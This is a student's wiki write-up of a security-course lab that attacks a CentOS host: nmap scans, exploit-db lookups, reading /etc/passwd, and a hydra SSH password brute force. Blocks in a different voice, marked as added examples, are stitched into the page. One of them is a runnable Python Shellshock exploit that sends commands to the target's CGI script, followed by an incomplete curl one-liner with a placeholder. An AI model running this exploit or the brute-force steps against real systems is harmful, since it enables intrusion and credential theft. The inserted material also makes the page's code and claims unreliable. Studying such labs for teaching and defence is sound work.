Activity 4.1 ‐ Exploiting Cupcake - Jacob-Mayotte/SEC335_Tech_Journal GitHub Wiki

Goal of assignment: The purpose of this activity is to give you a sense of some of the steps taken to recon, assess, exploit, achieve a foothold and elevate privileges on a system.

Tools Used:

  • nmap
  • nmaptocsv
  • exploit-db.com

Deliverables:

  1. Information on target:

sudo nmap -v 10.0.5.23 // ran a verbose scan (-v) against the target. It showed two open ports, so I added a flag to get more info:

sudo nmap -vv -A 10.0.5.23 // -A turns on OS detection, version detection, default scripts and traceroute (see the manual); lots more info

curl 10.0.5.23 // curious about what content is on the webpage; this fetches the index page the web server returns

  2/3. Open ports and operating system:

  • Ports running: port 22, SSH (OpenSSH 5.3, protocol 2.0); port 80, HTTP (Apache httpd 2.2.15 on CentOS).

  • OS guess: Linux 2.6 - 3.10, CentOS 6-7. A cgi-bin directory was found after running curl.

nmaptocsv -i top100.txt -d "," // converted the saved nmap output into comma-delimited CSV, one row per host and port

image

image
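nmaptocsv turns saved nmap output into one row per port. As an added example (my code, not the author's and not nmaptocsv's), here is a minimal Python parser for nmap's grepable (-oG) format that produces the same kind of CSV; the input line is constructed to mirror the two services found above and is not a real capture.

```python
"""Added example (not the author's code): turn nmap grepable output into CSV.

nmaptocsv does this for nmap normal, grepable and XML output; this is a small
stand-alone equivalent so the format is visible.  SAMPLE_GNMAP is a constructed
-oG line mirroring the page's findings (OpenSSH 5.3, Apache 2.2.15), not a
real capture of the lab target.
"""
import csv
import io

# Constructed sample of `nmap -sV -oG - 10.0.5.23` output (not a real capture).
SAMPLE_GNMAP = """# Nmap 7.94 scan initiated as: nmap -sV -oG - 10.0.5.23
Host: 10.0.5.23 ()\tStatus: Up
Host: 10.0.5.23 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/\tIgnored State: closed (98)
# Nmap done -- 1 IP address (1 host up) scanned
"""

FIELDS = ["host", "port", "proto", "state", "service", "version"]


def parse_gnmap(text):
    """Return one dict per (host, port) found in grepable output.

    Each entry in the Ports: field is
    'port/state/proto/owner/service/rpcinfo/version/'.  We split on at most
    six slashes so the version text at the end is kept whole.
    """
    rows = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comments, and the 'Status: Up' line, carry no ports
        host = line.split()[1]
        # The Ports: field ends at the tab before 'Ignored State:' (if present).
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            entry = entry.strip()
            if not entry:
                continue
            parts = entry.split("/", 6)
            if len(parts) < 7:
                continue  # malformed entry, skip rather than guess
            port, state, proto, _owner, service, _rpc, version = parts
            rows.append({
                "host": host,
                "port": int(port),
                "proto": proto,
                "state": state,
                "service": service,
                "version": version.rstrip("/").strip(),
            })
    return rows


def to_csv(rows, delimiter=","):
    """Render parsed rows as CSV text (the same idea as nmaptocsv -d ",")."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS, delimiter=delimiter,
                            lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    print(to_csv(parse_gnmap(SAMPLE_GNMAP)), end="")
```

To use it on a real scan, save the output with `nmap -sV -oG scan.gnmap 10.0.5.23` and pass the file contents to `parse_gnmap`; the grepable format is stable enough that the same parser covers many hosts in one file.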

  5. Potential remote vulnerabilities:

https://www.exploit-db.com/exploits/29290 = Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution (CVE-2012-1823). “This is a code execution bug in the combination of Apache and PHP. On Debian and Ubuntu, the vulnerability is present in the default install of the php5-cgi package.” It only applies where PHP is run as a CGI binary and query-string arguments reach php-cgi.

https://www.exploit-db.com/exploits/34900 = Apache mod_cgi 'Shellshock' Remote Command Injection (CVE-2014-6271). Bash evaluates function definitions it finds in environment variables, and Apache hands request headers such as User-Agent to a CGI script as environment variables, so one crafted header runs commands on the server.

This Source made sense of the second vulnerability.

  6. Determination of the target's kernel version:

image

  • Edited the command provided and removed some of the benign bits; this returned the kernel version.

  7. Similar screenshots that show:

  • Contents of /etc/passwd:

image

  • The code behind the status CGI:

image

  • Results of running ifconfig:

image

  • See Trials & Tribulations for an explanation!

  8. Password List:

Fortunately, we had a password list provided to us for this lab (rockyou.txt.gz). The first thing I did was cat the list: cat /usr/share/wordlists/rockyou.txt.gz. This printed a lot of encoded information that was useless to the eye (the file is still gzip-compressed). I had run into this problem before, and the lab hinted that the file must be extracted to get readable text. I did this via the file manager. I navigated to the location of the file:

image

and chose Extract to, placing the extracted file in my week04 folder in my class directory. I then ran cat on that file, which showed cleartext passwords. Then I looked at the contents of /etc/passwd, which we explored in deliverable 7. I noticed that most users could not log on, except for one user named samwise. That gave me a user we know has access to the machine, so I grepped the newly extracted password file for samwise:

  • grep -i samwise rockyou.txt > PotentialPasswordsSamWise.txt

Then I ran a cat against our new file:

image

  9. Hydra session:

Here I ran into the issue:

image

I followed this Source to solve the issue, I ran the following commands:

sudo apt update && sudo apt full-upgrade -y
sudo dpkg -l | grep kali-tweaks 
kali-tweaks -h

Then I was greeted with a menu screen; I selected 'Hardening' and toggled the SSH client option on (this re-enables the legacy key-exchange and cipher algorithms that an old OpenSSH 5.3 server still needs):

image

I ran the following command to initiate the hydra session:

sudo hydra -l samwise -P PotentialPasswordsSamWise.txt ssh://10.0.5.23 // hydra needs the service as well as the host, so the target is given as ssh://10.0.5.23. -l is the single username taken from /etc/passwd, and -P is the candidate password file I created for deliverable 8. I was able to receive the expected output:

image

While on the machine I ran: cat user-flag.txt and received the contents of the text file, which I included in the deliv screenshot.

  10. Root access + root-flag.txt:

I followed the video provided and completed this step, screenshot is in lab.

Trials & Tribulations:

For deliverable 7, I really struggled. I had to ask the professor a few times to walk me through the provided commands, which helped make sense of it. I tried to just cat the /etc/passwd file but received the following error:

image

I looked this up and found this Source, which explained why I could not see the contents of the file. As the source recommended, I redirected the contents of the passwd file into a new file called TestPW.txt, then ran cat TestPW.txt and saw the expected output.
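The error above, the /etc/passwd and kernel-version screenshots in deliverable 7, and exploit-db 34900 in deliverable 5 all come down to one mechanism, so here is one added example covering all three (my code, not the author's, the lab's, or exploit-db's): a Shellshock request against an Apache CGI script, the detection regex for the same marker in Apache logs, and the classic local bash check. The target address and the existence of a status CGI come from the page; the exact path /cgi-bin/status, the commands run, and the log lines are assumptions or constructed samples.

```python
"""Added example (not the author's or the lab's code): Shellshock
(CVE-2014-6271) against an Apache CGI script, the technique behind
exploit-db 34900.

Assumed, not taken from the page: the CGI path /cgi-bin/status, the commands
run, and the constructed log lines.  Nothing is sent on the wire unless
send_command() is called.
"""
import http.client
import re
import shlex
import shutil
import subprocess

TARGET = "10.0.5.23"          # the lab target from the nmap scan
CGI_PATH = "/cgi-bin/status"  # assumption: path of the "status cgi" the page mentions


def shellshock_payload(cmd, shell="/bin/bash"):
    """Header value that makes an unpatched bash run `cmd`.

    Apache passes request headers to the CGI process as environment variables
    (User-Agent -> HTTP_USER_AGENT).  A vulnerable bash imports any variable
    whose value starts with '() {' as a function and, because of the bug, keeps
    executing the text after the closing brace.  'echo;' emits the blank line
    that ends the CGI response headers, so the command output becomes the body;
    without it Apache sees the command output where headers should be, logs
    "malformed header from script" / "premature end of script headers" and
    answers 500, which is the error page you get when the first thing printed
    is /etc/passwd.
    """
    return "() { :; }; echo; %s -c %s" % (shell, shlex.quote(cmd))


def build_request(cmd, host=TARGET, path=CGI_PATH):
    """Raw HTTP/1.1 request text, for inspection or for replay with nc."""
    return ("GET %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\n"
            "Connection: close\r\n\r\n" % (path, host, shellshock_payload(cmd)))


def send_command(cmd, host=TARGET, path=CGI_PATH, timeout=10):
    """Live request: returns (status, body); body is the command output on 200."""
    conn = http.client.HTTPConnection(host, 80, timeout=timeout)
    conn.request("GET", path, headers={"User-Agent": shellshock_payload(cmd)})
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", "replace")
    conn.close()
    return resp.status, body


def command_output(status, body):
    """Turn a (status, body) pair into command output, or explain the failure."""
    if status == 200:
        return body
    if status == 500:
        raise RuntimeError("500: CGI headers missing; keep the 'echo;' in the payload")
    raise RuntimeError("unexpected HTTP status %d" % status)


def bash_is_vulnerable():
    """Classic local check: True if the bash on PATH runs the trailing command.

    Returns None if bash is not installed.  The variable is not exported via
    a CGI here; we simply hand it to bash in its environment.
    """
    bash = shutil.which("bash")
    if bash is None:
        return None
    out = subprocess.run([bash, "-c", "echo test"],
                         env={"x": "() { :;}; echo vulnerable"},
                         capture_output=True, text=True, timeout=5).stdout
    return "vulnerable" in out


# Detection side: the same function-definition marker in Apache combined logs.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Constructed sample log lines (not from the lab); the third carries the
# payload in the Referer field, which Apache also exports to the CGI.
SAMPLE_LOG = [
    '10.0.5.10 - - [10/Feb/2023:14:01:55 -0500] "GET / HTTP/1.1" 200 4532 "-" "curl/7.81.0"',
    '10.0.5.10 - - [10/Feb/2023:14:02:11 -0500] "GET /cgi-bin/status HTTP/1.1" 200 1021 "-" '
    '"() { :; }; echo; /bin/bash -c \'cat /etc/passwd\'"',
    '10.0.5.10 - - [10/Feb/2023:14:02:30 -0500] "GET /cgi-bin/status HTTP/1.1" 500 617 '
    '"() {:;}; /bin/cat /etc/passwd" "Mozilla/5.0"',
]


def shellshock_hits(lines):
    """Log lines carrying a bash function definition in any header field."""
    return [line for line in lines if SHELLSHOCK_RE.search(line)]


if __name__ == "__main__":
    print(build_request("cat /etc/passwd"))
    print("local bash vulnerable:", bash_is_vulnerable())
    for hit in shellshock_hits(SAMPLE_LOG):
        print("shellshock probe:", hit)
```

In the lab, `send_command("uname -r")` or `send_command("cat /etc/passwd")` returns the same text the screenshots show, and the equivalent one-liner is `curl -H "User-Agent: $(python3 -c 'import sys; ...')"`, or simply pasting the `shellshock_payload` string into curl's -H. On the defensive side, the 500 in the third log line is itself a tell: a Shellshock attempt without the `echo;` still ran the command even though the attacker got an error page back.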

This entire lab was extremely eye-opening to me. I have never performed anything like this, and taking on this perspective is really informative, and mind-boggling at times. I find the concepts difficult to grasp at first, but once time is spent actually understanding what is happening, it is extremely satisfying. I really enjoy looking at cyber through this lens because it is allowing me to finally understand what a threat actor is actually doing, which I believe will assist in incident investigations.

Sources: